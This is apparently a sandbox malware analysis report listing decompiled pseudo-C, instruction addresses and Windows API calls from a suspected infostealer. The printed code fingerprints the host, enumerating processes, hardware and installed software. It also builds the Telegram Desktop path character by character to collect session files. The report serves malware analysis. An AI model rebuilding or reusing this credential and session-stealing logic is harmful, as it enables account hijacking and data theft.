				_t226 = E004173A7( &_v100048, _t336, 0, _t359);
				_v8 = 6;
				_t360 =  *((intOrPtr*)(_t226 + 0x14)) - 0x10;
				if( *((intOrPtr*)(_t226 + 0x14)) >= 0x10) {
					_t226 =  *_t226;
				}
				 *0x4474e0( &_v100020, _t226);
				_v8 = _v8 | 0xffffffff;
				E00404A66( &_v100048, 1, 0);
				 *0x4474e0( &_v100020, _t336);
				 *0x4474e0( &_v100020,  *0x446e94); // executed
				_t234 = E0041754C(); // executed
				 *0x4474e0( &_v100020, _t234);
				 *0x4474e0( &_v100020, _t336);
				 *0x4474e0( &_v100020,  *0x447278);
				 *0x4474e0( &_v100020, E004169DC());
				 *0x4474e0( &_v100020, _t336);
				 *0x4474e0( &_v100020,  *0x446a50);
				_t345 =  &_v100048;
				_t248 = E004174A0(_t313,  &_v100048, _t334, _t336,  &_v100048, _t360, _t364); // executed
				_v8 = 7;
				_t361 =  *((intOrPtr*)(_t248 + 0x14)) - 0x10;
				if( *((intOrPtr*)(_t248 + 0x14)) >= 0x10) {
					_t248 =  *_t248;
				}
				 *0x4474e0( &_v100020, _t248);
				_v8 = _v8 | 0xffffffff;
				E00404A66( &_v100048, 1, 0);
				 *0x4474e0( &_v100020, "\n\n");
				 *0x4474e0( &_v100020,  *0x4470b4);
				 *0x4474e0( &_v100020, _t336);
				 *0x4474e0( &_v100020,  *0x446a8c); // executed
				_t260 = E00416D27(_t336, _t345); // executed
				 *0x4474e0( &_v100020, _t260);
				 *0x4474e0( &_v100020, _t336);
				 *0x4474e0( &_v100020,  *0x446b04);
				_t267 = E00416CDA(_t313, _t334,  &_v100048, _t345, _t361); // executed
				_v8 = 8;
				_t362 =  *((intOrPtr*)(_t267 + 0x14)) - 0x10;
				if( *((intOrPtr*)(_t267 + 0x14)) >= 0x10) {
					_t267 =  *_t267;
				}
				 *0x4474e0( &_v100020, _t267);
				_v8 = _v8 | 0xffffffff;
				E00404A66( &_v100048, 1, 0);
				_t338 = "\n";
				 *0x4474e0( &_v100020, _t338);
				 *0x4474e0( &_v100020,  *0x446b44); // executed
				_t275 = E00416FCD(0, _t345); // executed
				 *0x4474e0( &_v100020, _t275);
				 *0x4474e0( &_v100020, _t338);
				 *0x4474e0( &_v100020,  *0x446fa8);
				_v100476.cb = 0x1a8;
				EnumDisplayDevicesA(0, 0,  &_v100476, 1);
				 *0x4474e0( &_v100020,  &(_v100476.DeviceString));
				 *0x4474e0( &_v100020, _t338);
				 *0x4474e0( &_v100020,  *0x446bd8);
				 *0x4474e0( &_v100020, _t338);
				_t346 =  &_v100020;
				E00417648(0, _t334, _t338, _t346, _t362); // executed
				 *0x4474e0(_t346, _t338);
				 *0x4474e0( *0x446b00);
				 *0x4474e0();
				E00416DD7(_t346); // executed
				E0041EAE0(_v100480,  *0x446d88, lstrlenA(_t346), 3); // executed
				_t307 = E0041F6B0(_t346, 0, 0x186a0);
				 *[fs:0x0] = _v16;
				_t339 = _t346;
				_t347 = _t338;
				_t315 = _t346;
				return E0041F69E(_t307, _t315, _v20 ^ _t348, _t334, _t339, _t347);
			}

0x0040bba9
0x0040bba9
0x0040bba9
0x0040bbbf
0x0040bbc4
0x0040bbc9
0x0040bbcb
0x0040bbd5
0x0040bbdb
0x0040bbe5
0x0040bbf5
0x0040bc0a
0x0040bc17
0x0040bc1c
0x0040bc23
0x0040bc25
0x0040bc25
0x0040bc2f
0x0040bc35
0x0040bc44
0x0040bc55
0x0040bc68
0x0040bc7b
0x0040bc81
0x0040bc8e
0x0040bca1
0x0040bcad
0x0040bcb2
0x0040bcb9
0x0040bcbb
0x0040bcbb
0x0040bcc5
0x0040bccb
0x0040bcd8
0x0040bce5
0x0040bcf8
0x0040bcfe
0x0040bd04
0x0040bd09
0x0040bd10
0x0040bd14
0x0040bd16
0x0040bd16
0x0040bd20
0x0040bd26
0x0040bd33
0x0040bd40
0x0040bd53
0x0040bd5f
0x0040bd64
0x0040bd6f
0x0040bd71
0x0040bd71
0x0040bd7b
0x0040bd81
0x0040bd8e
0x0040bd9f
0x0040bdb2
0x0040bdb8
0x0040bdbf
0x0040bdc5
0x0040bdcb
0x0040bdd2
0x0040bdd6
0x0040bdd8
0x0040bdd8
0x0040bde2
0x0040bde8
0x0040bdf7
0x0040be04
0x0040be17
0x0040be29
0x0040be3c
0x0040be42
0x0040be4f
0x0040be61
0x0040be74
0x0040be86
0x0040be99
0x0040beac
0x0040beba
0x0040becd
0x0040bed3
0x0040bee0
0x0040beee
0x0040bf01
0x0040bf0d
0x0040bf12
0x0040bf19
0x0040bf1d
0x0040bf1f
0x0040bf1f
0x0040bf29
0x0040bf2f
0x0040bf3c
0x0040bf49
0x0040bf5c
0x0040bf62
0x0040bf68
0x0040bf6d
0x0040bf74
0x0040bf78
0x0040bf7a
0x0040bf7a
0x0040bf84
0x0040bf8a
0x0040bf97
0x0040bfa4
0x0040bfb7
0x0040bfbd
0x0040bfca
0x0040bfd8
0x0040bfeb
0x0040bffe
0x0040c00c
0x0040c01f
0x0040c025
0x0040c02b
0x0040c030
0x0040c037
0x0040c03b
0x0040c03d
0x0040c03d
0x0040c047
0x0040c04d
0x0040c05b
0x0040c06c
0x0040c07f
0x0040c08d
0x0040c0a0
0x0040c0a6
0x0040c0b3
0x0040c0c1
0x0040c0d4
0x0040c0e0
0x0040c0e5
0x0040c0ec
0x0040c0f0
0x0040c0f2
0x0040c0f2
0x0040c0fc
0x0040c102
0x0040c111
0x0040c116
0x0040c123
0x0040c136
0x0040c13c
0x0040c149
0x0040c157
0x0040c16a
0x0040c17b
0x0040c185
0x0040c199
0x0040c1a7
0x0040c1ba
0x0040c1c8
0x0040c1ce
0x0040c1d4
0x0040c1dd
0x0040c1ec
0x0040c1f6
0x0040c1ff
0x0040c21e
0x0040c22f
0x0040c23a
0x0040c242
0x0040c243
0x0040c244
0x0040c250

APIs

_memset.LIBCMT ref: 0040BBF5
lstrcat.KERNEL32(?), ref: 0040BC0A
lstrcat.KERNEL32(?,00000000), ref: 0040BC2F
lstrcat.KERNEL32(?,0043F4D8), ref: 0040BC55
lstrcat.KERNEL32(?), ref: 0040BC68
lstrcat.KERNEL32(?,00000000), ref: 0040BC7B
lstrcat.KERNEL32(?,0043D130), ref: 0040BC8E
lstrcat.KERNEL32(?), ref: 0040BCA1
lstrcat.KERNEL32(?,00000000), ref: 0040BCC5
lstrcat.KERNEL32(?,0043D130), ref: 0040BCE5
lstrcat.KERNEL32(?), ref: 0040BCF8
lstrcat.KERNEL32(?,00000000), ref: 0040BD20
lstrcat.KERNEL32(?,0043D130), ref: 0040BD40
lstrcat.KERNEL32(?), ref: 0040BD53
lstrcat.KERNEL32(?,00000000), ref: 0040BD7B
lstrcat.KERNEL32(?,0043F4D8), ref: 0040BD9F
lstrcat.KERNEL32(?), ref: 0040BDB2
GetCurrentProcessId.KERNEL32(?,?,?,004341E4,000000FF), ref: 0040BDB8

Part of subcall function 00417EF5: OpenProcess.KERNEL32(00000410,00000000,00000010,?), ref: 00417F1B
Part of subcall function 00417EF5: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00417F36
Part of subcall function 00417EF5: CloseHandle.KERNEL32(00000000), ref: 00417F3D

lstrcat.KERNEL32(?,00000000), ref: 0040BDE2
lstrcat.KERNEL32(?,0043D130), ref: 0040BE04
lstrcat.KERNEL32(?), ref: 0040BE17
lstrcat.KERNEL32(?,0043F4D8), ref: 0040BE29
lstrcat.KERNEL32(?), ref: 0040BE3C
lstrcat.KERNEL32(?,00000000), ref: 0040BE4F
lstrcat.KERNEL32(?,0043F4DC), ref: 0040BE61
lstrcat.KERNEL32(?,00000000), ref: 0040BE74
lstrcat.KERNEL32(?,0043F4E0), ref: 0040BE86
lstrcat.KERNEL32(?), ref: 0040BE99
lstrcat.KERNEL32(?,00000000), ref: 0040BEAC
lstrcat.KERNEL32(?,0043D130), ref: 0040BEBA
lstrcat.KERNEL32(?), ref: 0040BECD
lstrcat.KERNEL32(?,00000000), ref: 0040BEE0
lstrcat.KERNEL32(?,0043D130), ref: 0040BEEE
lstrcat.KERNEL32(?), ref: 0040BF01
lstrcat.KERNEL32(?,00000000), ref: 0040BF29
lstrcat.KERNEL32(?,0043D130), ref: 0040BF49
lstrcat.KERNEL32(?), ref: 0040BF5C
lstrcat.KERNEL32(?,00000000), ref: 0040BF84
lstrcat.KERNEL32(?,0043D130), ref: 0040BFA4
lstrcat.KERNEL32(?), ref: 0040BFB7
lstrcat.KERNEL32(?,00000000), ref: 0040BFCA
lstrcat.KERNEL32(?,0043D130), ref: 0040BFD8
lstrcat.KERNEL32(?), ref: 0040BFEB
lstrcat.KERNEL32(?,00000000), ref: 0040BFFE
lstrcat.KERNEL32(?,0043D130), ref: 0040C00C
lstrcat.KERNEL32(?), ref: 0040C01F
lstrcat.KERNEL32(?,00000000), ref: 0040C047
lstrcat.KERNEL32(?,0043F4D8), ref: 0040C06C
lstrcat.KERNEL32(?), ref: 0040C07F
lstrcat.KERNEL32(?,0043D130), ref: 0040C08D
lstrcat.KERNEL32(?), ref: 0040C0A0
lstrcat.KERNEL32(?,00000000), ref: 0040C0B3
lstrcat.KERNEL32(?,0043D130), ref: 0040C0C1
lstrcat.KERNEL32(?), ref: 0040C0D4
lstrcat.KERNEL32(?,00000000), ref: 0040C0FC

Part of subcall function 00404A66: _memmove.LIBCMT ref: 00404A86

lstrcat.KERNEL32(?,0043D130), ref: 0040C123
lstrcat.KERNEL32(?), ref: 0040C136

Part of subcall function 00416FCD: GetProcessHeap.KERNEL32(00000000,00000104,0043D130), ref: 00416FE5
Part of subcall function 00416FCD: HeapAlloc.KERNEL32(00000000), ref: 00416FEC
Part of subcall function 00416FCD: _memset.LIBCMT ref: 00416FFC
Part of subcall function 00416FCD: GlobalMemoryStatusEx.KERNEL32(?), ref: 0041700F
Part of subcall function 00416FCD: wsprintfA.USER32 ref: 00417035

lstrcat.KERNEL32(?,00000000), ref: 0040C149
lstrcat.KERNEL32(?,0043D130), ref: 0040C157
lstrcat.KERNEL32(?), ref: 0040C16A
EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 0040C185
lstrcat.KERNEL32(?,?), ref: 0040C199
lstrcat.KERNEL32(?,0043D130), ref: 0040C1A7
lstrcat.KERNEL32(?), ref: 0040C1BA
lstrcat.KERNEL32(?,0043D130), ref: 0040C1C8

Part of subcall function 00417648: __EH_prolog3_GS.LIBCMT ref: 00417652
Part of subcall function 00417648: CreateToolhelp32Snapshot.KERNEL32 ref: 00417665
Part of subcall function 00417648: Process32First.KERNEL32(00000000,00000128), ref: 00417675
Part of subcall function 00417648: Process32Next.KERNEL32(00000000,00000128), ref: 004176ED
Part of subcall function 00417648: CloseHandle.KERNEL32(00000000), ref: 004176F8

lstrcat.KERNEL32(?,0043D130), ref: 0040C1DD
lstrcat.KERNEL32(?), ref: 0040C1EC
lstrcat.KERNEL32(?,0043D130), ref: 0040C1F6

Part of subcall function 00416DD7: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,0043D130,?,00000000), ref: 00416E2D
Part of subcall function 00416DD7: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00416E69
Part of subcall function 00416DD7: wsprintfA.USER32 ref: 00416E91
Part of subcall function 00416DD7: RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?), ref: 00416EAF
Part of subcall function 00416DD7: RegQueryValueExA.KERNEL32(?,DisplayName,00000000,?,?,00000400), ref: 00416EE8
Part of subcall function 00416DD7: lstrcat.KERNEL32(?,?), ref: 00416F03
Part of subcall function 00416DD7: RegQueryValueExA.KERNEL32(?,DisplayVersion,00000000,?,?,00000400), ref: 00416F34
Part of subcall function 00416DD7: lstrcat.KERNEL32(?,0043F4DC), ref: 00416F49
Part of subcall function 00416DD7: lstrcat.KERNEL32(?,?), ref: 00416F5C

lstrlenA.KERNEL32(?,?,?,?,?,004341E4,000000FF), ref: 0040C207
_memset.LIBCMT ref: 0040C22F

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$OpenProcess_memset$CloseEnumHandleHeapProcess32QueryValuewsprintf$AllocCreateCurrentDevicesDisplayFileFirstGlobalH_prolog3_MemoryModuleNameNextSnapshotStatusToolhelp32_memmovelstrlen
String ID:
API String ID: 2578749624-0
Opcode ID: 5445488fc435902dcbd8f542332e338e602341d2f7eb5e1047ae7bcd36a65084
Instruction ID: 4fa7bfc07fcbc5209ea7267884f81292a5c97ccb94a2a61969986179087c129e
Opcode Fuzzy Hash: 5445488fc435902dcbd8f542332e338e602341d2f7eb5e1047ae7bcd36a65084
Instruction Fuzzy Hash: D60268B6904119ABDB20DFA0ED48DEA7F7DFB06358B1449AAB116E3070DB349345CF29

Uniqueness

Uniqueness Score: -1.00%

Function 00414A9F Relevance: 103.9, APIs: 52, Strings: 7, Instructions: 615
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 15%

			E00414A9F(void* __edx, char* __esi, void* __eflags, char _a4, intOrPtr _a8) {
				signed int _v8;
				char _v16;
				signed int _v20;
				char _v284;
				char _v548;
				char _v812;
				char _v100812;
				char _v100840;
				char _v100868;
				char _v100896;
				char _v100924;
				char _v100928;
				intOrPtr _v100932;
				char _v100936;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t147;
				signed int _t148;
				char _t152;
				void* _t153;
				intOrPtr _t198;
				intOrPtr _t199;
				void* _t205;
				void* _t310;
				intOrPtr* _t312;
				void* _t317;
				intOrPtr* _t319;
				void* _t324;
				intOrPtr* _t326;
				void* _t331;
				intOrPtr* _t333;
				intOrPtr _t346;
				intOrPtr _t348;
				intOrPtr _t350;
				intOrPtr _t352;
				intOrPtr _t354;
				intOrPtr _t356;
				intOrPtr _t358;
				void* _t363;
				intOrPtr _t365;
				intOrPtr _t366;
				void* _t368;
				char* _t369;
				char* _t370;
				char* _t371;
				char* _t372;
				intOrPtr _t373;
				void* _t378;
				intOrPtr _t379;
				intOrPtr _t380;
				intOrPtr _t381;
				intOrPtr _t382;
				intOrPtr _t383;
				intOrPtr _t384;
				intOrPtr _t385;
				intOrPtr _t386;
				intOrPtr _t387;
				intOrPtr _t388;
				intOrPtr _t389;
				intOrPtr _t390;
				intOrPtr _t391;
				intOrPtr _t392;
				intOrPtr _t393;
				intOrPtr _t394;
				intOrPtr _t395;
				intOrPtr _t396;
				void* _t422;
				void* _t423;
				void* _t424;
				void* _t425;
				void* _t426;
				void* _t427;
				void* _t428;
				void* _t430;
				void* _t435;
				char* _t437;
				char* _t439;
				signed int _t440;
				void* _t441;
				void* _t442;
				void* _t448;
				void* _t449;
				void* _t450;
				void* _t451;

				_t451 = __eflags;
				_t439 = __esi;
				_t430 = __edx;
				_push(0xffffffff);
				_push(E004345EE);
				_push( *[fs:0x0]);
				E0042E350(0x18a38);
				_t147 =  *0x444664; // 0xfa3a0753
				_t148 = _t147 ^ _t440;
				_v20 = _t148;
				_push(_t363);
				 *[fs:0x0] =  &_v16;
				E0041F6B0( &_v100812, 0, 0x186a0);
				_t442 = _t441 + 0xc;
				 *((intOrPtr*)(__esi + 0xc)) = 0;
				 *((intOrPtr*)(__esi + 0x10)) = 0;
				 *((intOrPtr*)(__esi + 8)) = 0;
				 *((intOrPtr*)(__esi + 0x18)) = 0;
				 *((intOrPtr*)(__esi + 0x14)) = 0;
				 *((intOrPtr*)(__esi + 0x1c)) = 0;
				_t152 = E00420467(_t363, _t430, 0, __esi, _t451, 0x20);
				_v100936 = _a4;
				_v100932 = _a8;
				_v100928 = _t152;
				_t153 = E0040479E(_t152, _t430, 0, __esi,  &_v100936); // executed
				_t378 = _t148;
				_t452 = _t153;
				if(_t153 == 0) {
					_t433 = _v100928;
					__eflags = _v100928;
					if(__eflags != 0) {
						_t346 = E0040490F(_t433, _t378,  *0x446ac8);
						_pop(_t422);
						 *0x4472b8 = _t346;
						_t348 = E0040490F(_t433, _t422,  *0x446e90);
						_pop(_t423);
						 *0x4472d4 = _t348;
						_t350 = E0040490F(_t433, _t423,  *0x447120);
						_pop(_t424);
						 *0x447308 = _t350;
						_t352 = E0040490F(_t433, _t424,  *0x446e64);
						_pop(_t425);
						 *0x4472f4 = _t352;
						_t354 = E0040490F(_t433, _t425,  *0x44718c);
						_pop(_t426);
						 *0x4472e8 = _t354;
						_t356 = E0040490F(_t433, _t426,  *0x446f24);
						_pop(_t427);
						 *0x447304 = _t356;
						_t358 = E0040490F(_t433, _t427,  *0x446ff0);
						_pop(_t428);
						 *0x4472e0 = _t358;
						 *0x4472d8 = E0040490F(_t433, _t428,  *0x446ea4);
					}
				} else {
					E0041F6B0( &_v100928, 0, 4);
					_t442 = _t442 + 0xc;
				}
				_t365 =  *0x446f44; // 0x6e8650
				_t434 = _t439; // executed
				E00414903(_t365, _t430, _t439, _t452,  *0x447134,  &_v100812);
				_t366 =  *0x446bb0; // 0x6e8678
				E00414903(_t366, _t430, _t439, _t452,  *0x446ee8,  &_v100812); // executed
				_push( &_v100812);
				_push( *0x447060);
				_push( *0x446dcc);
				_push(_t439); // executed
				E00414500(_t366, _t430, _t439, _t439, _t452); // executed
				_push( &_v100812);
				_push( *0x446ac0);
				_push( *0x446df4);
				_push(_t439); // executed
				E00414500(_t366, _t430, _t434, _t439, _t452);
				_t379 =  *0x446e08; // 0x6e87f8
				_push( &_v100812);
				_push( *0x446e74);
				_push(_t439); // executed
				E00414333(_t366, _t379, _t430, _t434, _t439, _t452);
				_t380 =  *0x447100; // 0x6e99a8
				_push( &_v100812);
				_push( *0x446c0c);
				_push(_t439); // executed
				E00414333(_t366, _t380, _t430, _t434, _t439, _t452);
				_t381 =  *0x446bec; // 0x6e9be8
				_push( &_v100812);
				_push( *0x446f90);
				_push(_t439); // executed
				E00414333(_t366, _t381, _t430, _t434, _t439, _t452);
				_t382 =  *0x446ec8; // 0x6e9a68
				_push( &_v100812);
				_push( *0x446e78);
				_push(_t439); // executed
				E00414333(_t366, _t382, _t430, _t434, _t439, _t452);
				_t383 =  *0x447274; // 0x6e9c08
				_push( &_v100812);
				_push( *0x446ea0);
				_push(_t439); // executed
				E00414333(_t366, _t383, _t430, _t434, _t439, _t452);
				_t384 =  *0x446a6c; // 0x6e8820
				_push( &_v100812);
				_push( *0x44717c);
				_push(_t439); // executed
				E00414333(_t366, _t384, _t430, _t434, _t439, _t452);
				_t385 =  *0x446e40; // 0x6e8848
				_push( &_v100812);
				_push( *0x4470a4);
				_push(_t439); // executed
				E00414333(_t366, _t385, _t430, _t434, _t439, _t452);
				_t386 =  *0x44706c; // 0x6e8878
				_push( &_v100812);
				_push( *0x446a78);
				_push(_t439); // executed
				E00414333(_t366, _t386, _t430, _t434, _t439, _t452);
				_t387 =  *0x446c2c; // 0x6e9720
				_push( &_v100812);
				_push( *0x446e3c);
				_push(_t439); // executed
				E00414333(_t366, _t387, _t430, _t434, _t439, _t452); // executed
				_push( &_v100812);
				_push( *0x446ba8);
				_push(_t439);
				_t388 =  *0x446c4c; // 0x6e9a88, executed
				E00414333(_t366, _t388, _t430, _t434, _t439, _t452);
				_t389 =  *0x446ef4; // 0x6e9c28
				_push( &_v100812);
				_push( *0x446e30);
				_push(_t439); // executed
				E00414333(_t366, _t389, _t430, _t434, _t439, _t452);
				_t390 =  *0x446a98; // 0x6e9ba8
				_push( &_v100812);
				_push( *0x4471b0);
				_push(_t439); // executed
				E00414333(_t366, _t390, _t430, _t434, _t439, _t452);
				_t391 =  *0x446b84; // 0x6e9a28
				_push( &_v100812);
				_push( *0x446ad4);
				_push(_t439); // executed
				E00414333(_t366, _t391, _t430, _t434, _t439, _t452);
				_t392 =  *0x446ffc; // 0x6e88a0
				_push( &_v100812);
				_push( *0x44727c);
				_push(_t439); // executed
				E00414333(_t366, _t392, _t430, _t434, _t439, _t452);
				_t393 =  *0x44701c; // 0x6e88c8
				_push( &_v100812);
				_push( *0x446b64);
				_push(_t439); // executed
				E00414333(_t366, _t393, _t430, _t434, _t439, _t452);
				_t394 =  *0x446a44; // 0x6e9d08
				_push( &_v100812);
				_push( *0x44714c);
				_push(_t439); // executed
				E00414333(_t366, _t394, _t430, _t434, _t439, _t452);
				_t395 =  *0x4470c8; // 0x6ec240
				_push( &_v100812);
				_push( *0x446af0);
				_push(_t439); // executed
				E00414333(_t366, _t395, _t430, _t434, _t439, _t452);
				_t396 =  *0x446ab4; // 0x6eb6d0
				_push( &_v100812);
				_push( *0x446cd4);
				_push(_t439); // executed
				E00414333(_t366, _t396, _t430, _t434, _t439, _t452); // executed
				_t453 =  *_t439;
				if( *_t439 != 0) {
					_push(_t439); // executed
					E0041212B(_t366, _t434, _t439, _t453); // executed
					_t454 =  *_t439;
					if( *_t439 != 0) {
						_push( &_v100812); // executed
						E00412D82(_t366, _t430, _t434, _t439, _t454);
						_t373 =  *0x446ed8; // 0x6ea6f8
						E00414903(_t373, _t430, _t434, _t454,  *0x446c48,  &_v100812); // executed
						_push( &_v100812); // executed
						E00411AD2(_t373, _t434, _t439, _t454); // executed
					}
				}
				_t367 = 0;
				if( *((intOrPtr*)(_t439 + 5)) != 0) {
					E0041F6B0( &_v284, 0, 0x104);
					E0041F6B0( &_v812, 0, 0x104);
					E0041F6B0( &_v548, 0, 0x104);
					 *0x4474e0( &_v284, E004181BE(0, 0x104, _t439, 0x1a));
					 *0x4474e0( &_v284, "\\");
					 *0x4474e0( &_v284, "T");
					_t369 = "e";
					 *0x4474e0( &_v284, _t369);
					 *0x4474e0( &_v284, "l");
					 *0x4474e0( &_v284, _t369);
					 *0x4474e0( &_v284, "g");
					 *0x4474e0( &_v284, "r");
					 *0x4474e0( &_v284, "a");
					 *0x4474e0( &_v284, "m");
					 *0x4474e0( &_v284, " ");
					_t437 = "D";
					 *0x4474e0( &_v284, _t437);
					 *0x4474e0( &_v284, _t369);
					 *0x4474e0( &_v284, "s");
					 *0x4474e0( &_v284, "k");
					 *0x4474e0( &_v284, "t");
					 *0x4474e0( &_v284, "o");
					 *0x4474e0( &_v284, "p");
					 *0x4474e0( &_v284, "\\");
					 *0x4474e0( &_v812, "k");
					 *0x4474e0( &_v812, _t369);
					 *0x4474e0( &_v812, "y");
					 *0x4474e0( &_v812, "_");
					 *0x4474e0( &_v812, "d");
					_t370 = "a";
					 *0x4474e0( &_v812, _t370);
					 *0x4474e0( &_v812, "t");
					 *0x4474e0( &_v812, _t370);
					 *0x4474e0( &_v812, "s");
					 *0x4474e0( &_v548, _t437);
					 *0x4474e0( &_v548, "8");
					_t371 = "7";
					 *0x4474e0( &_v548, _t371);
					 *0x4474e0( &_v548, _t371);
					 *0x4474e0( &_v548, "F");
					 *0x4474e0( &_v548, _t371);
					 *0x4474e0( &_v548, "8");
					_t372 = "3";
					 *0x4474e0( &_v548, _t372);
					 *0x4474e0( &_v548, _t437);
					 *0x4474e0( &_v548, "5");
					 *0x4474e0( &_v548, _t437);
					 *0x4474e0( &_v548, _t372);
					 *0x4474e0( &_v548, "E");
					 *0x4474e0( &_v548, "F");
					 *0x4474e0( &_v548, "8");
					 *0x4474e0( &_v548, "C");
					 *0x4474e0( &_v548, "*");
					E00412548(_t439, _t430, 0x43d12c,  &_v284,  &_v812); // executed
					E00412548(_t439, _t430, 0x43d12c,  &_v284,  &_v548); // executed
					_t310 = E004049CF( &_v100840, "p*");
					_t367 = 0;
					_v8 = 0;
					_t312 = E00404DB2( &_v100840,  &_v100868, "ma", _t310);
					_t448 = _t442 + 0x30;
					_v8 = 1;
					if( *((intOrPtr*)(_t312 + 0x14)) >= 0x10) {
						_t312 =  *_t312;
					}
					E00412548(_t439, _t430, 0x43d12c,  &_v284, _t312);
					E00404A66( &_v100868, 1, _t367);
					_v8 = _v8 | 0xffffffff;
					E00404A66( &_v100840, 1, _t367);
					_t317 = E004049CF( &_v100868, "BC10B77*");
					_v8 = 2;
					_t319 = E00404DB2( &_v100868,  &_v100840, "A7FDF864F", _t317);
					_t449 = _t448 + 0xc;
					_v8 = 3;
					if( *((intOrPtr*)(_t319 + 0x14)) >= 0x10) {
						_t319 =  *_t319;
					}
					E00412548(_t439, _t430, 0x43d12c,  &_v284, _t319);
					E00404A66( &_v100840, 1, _t367);
					_v8 = _v8 | 0xffffffff;
					E00404A66( &_v100868, 1, _t367);
					_t324 = E004049CF( &_v100868, "A6F891F2*");
					_v8 = 4;
					_t326 = E00404DB2( &_v100868,  &_v100840, "A92DAA6E", _t324);
					_t450 = _t449 + 0xc;
					_v8 = 5;
					if( *((intOrPtr*)(_t326 + 0x14)) >= 0x10) {
						_t326 =  *_t326;
					}
					E00412548(_t439, _t430, 0x43d12c,  &_v284, _t326);
					E00404A66( &_v100840, 1, _t367);
					_v8 = _v8 | 0xffffffff;
					E00404A66( &_v100868, 1, _t367);
					_t331 = E004049CF( &_v100924, "C461824F*");
					_v8 = 6;
					_t333 = E00404DB2( &_v100924,  &_v100896, "F8806DD0", _t331);
					_t442 = _t450 + 0xc;
					_v8 = 7;
					if( *((intOrPtr*)(_t333 + 0x14)) >= 0x10) {
						_t333 =  *_t333;
					}
					E00412548(_t439, _t430, 0x43d12c,  &_v284, _t333);
					E00404A66( &_v100896, 1, _t367);
					_v8 = _v8 | 0xffffffff;
					E00404A66( &_v100924, 1, _t367);
				}
				_t198 =  *0x4472ec; // 0x0
				 *((intOrPtr*)(_t439 + 0xc)) = _t198;
				_t199 =  *0x4472f8; // 0x0
				 *((intOrPtr*)(_t439 + 0x10)) = _t199;
				E0041EAE0( *((intOrPtr*)(_t439 + 0x20)),  *0x4470e4, lstrlenA( &_v100812), 3);
				_t205 = E0041F6B0( &_v100812, _t367, 0x186a0);
				 *[fs:0x0] = _v16;
				_pop(_t435);
				_pop(_t368);
				return E0041F69E(_t205, _t368, _v20 ^ _t440, _t430, _t435, _t439);
			}

0x00414a9f
0x00414a9f
0x00414a9f
0x00414aa2
0x00414aa4
0x00414aaf
0x00414ab5
0x00414aba
0x00414abf
0x00414ac1
0x00414ac4
0x00414aca
0x00414adf
0x00414ae4
0x00414ae9
0x00414aec
0x00414aef
0x00414af2
0x00414af5
0x00414af8
0x00414afb
0x00414b04
0x00414b0d
0x00414b1c
0x00414b22
0x00414b27
0x00414b28
0x00414b2a
0x00414b43
0x00414b49
0x00414b4b
0x00414b59
0x00414b5e
0x00414b65
0x00414b6c
0x00414b71
0x00414b78
0x00414b7f
0x00414b84
0x00414b8b
0x00414b92
0x00414b97
0x00414b9e
0x00414ba5
0x00414baa
0x00414bb1
0x00414bb8
0x00414bbd
0x00414bc4
0x00414bcb
0x00414bd0
0x00414bd7
0x00414be4
0x00414be4
0x00414b2c
0x00414b36
0x00414b3b
0x00414b3b
0x00414be9
0x00414bfc
0x00414bfe
0x00414c03
0x00414c16
0x00414c21
0x00414c22
0x00414c28
0x00414c2e
0x00414c2f
0x00414c3a
0x00414c3b
0x00414c41
0x00414c47
0x00414c48
0x00414c4d
0x00414c59
0x00414c5a
0x00414c60
0x00414c61
0x00414c66
0x00414c72
0x00414c73
0x00414c79
0x00414c7a
0x00414c7f
0x00414c8b
0x00414c8c
0x00414c92
0x00414c93
0x00414c98
0x00414ca4
0x00414ca5
0x00414cab
0x00414cac
0x00414cb1
0x00414cbd
0x00414cbe
0x00414cc4
0x00414cc5
0x00414cca
0x00414cd6
0x00414cd7
0x00414cdd
0x00414cde
0x00414ce3
0x00414cef
0x00414cf0
0x00414cf6
0x00414cf7
0x00414cfc
0x00414d08
0x00414d09
0x00414d0f
0x00414d10
0x00414d15
0x00414d21
0x00414d22
0x00414d28
0x00414d29
0x00414d34
0x00414d35
0x00414d3b
0x00414d3c
0x00414d42
0x00414d47
0x00414d53
0x00414d54
0x00414d5a
0x00414d5b
0x00414d60
0x00414d6c
0x00414d6d
0x00414d73
0x00414d74
0x00414d79
0x00414d85
0x00414d86
0x00414d8c
0x00414d8d
0x00414d92
0x00414d9e
0x00414d9f
0x00414da5
0x00414da6
0x00414dab
0x00414db7
0x00414db8
0x00414dbe
0x00414dbf
0x00414dc4
0x00414dd0
0x00414dd1
0x00414dd7
0x00414dd8
0x00414ddd
0x00414de9
0x00414dea
0x00414df0
0x00414df1
0x00414df6
0x00414e02
0x00414e03
0x00414e09
0x00414e0a
0x00414e0f
0x00414e12
0x00414e14
0x00414e15
0x00414e1a
0x00414e1d
0x00414e25
0x00414e26
0x00414e2b
0x00414e3e
0x00414e49
0x00414e4a
0x00414e4f
0x00414e1d
0x00414e50
0x00414e55
0x00414e69
0x00414e7a
0x00414e8b
0x00414ea3
0x00414eb5
0x00414ec7
0x00414ecd
0x00414eda
0x00414eec
0x00414efa
0x00414f0c
0x00414f1e
0x00414f30
0x00414f42
0x00414f54
0x00414f5a
0x00414f67
0x00414f75
0x00414f87
0x00414f99
0x00414fab
0x00414fbd
0x00414fcf
0x00414fe1
0x00414ff3
0x00415001
0x00415013
0x00415025
0x00415037
0x0041503d
0x0041504a
0x0041505c
0x0041506a
0x0041507c
0x0041508a
0x0041509c
0x004150a2
0x004150af
0x004150bd
0x004150cf
0x004150dd
0x004150ef
0x004150f5
0x00415102
0x00415110
0x00415122
0x00415130
0x0041513e
0x00415150
0x00415162
0x00415174
0x00415186
0x00415198
0x004151b4
0x004151ca
0x004151da
0x004151eb
0x004151ee
0x004151f1
0x004151f6
0x004151f9
0x00415201
0x00415203
0x00415203
0x00415210
0x0041521e
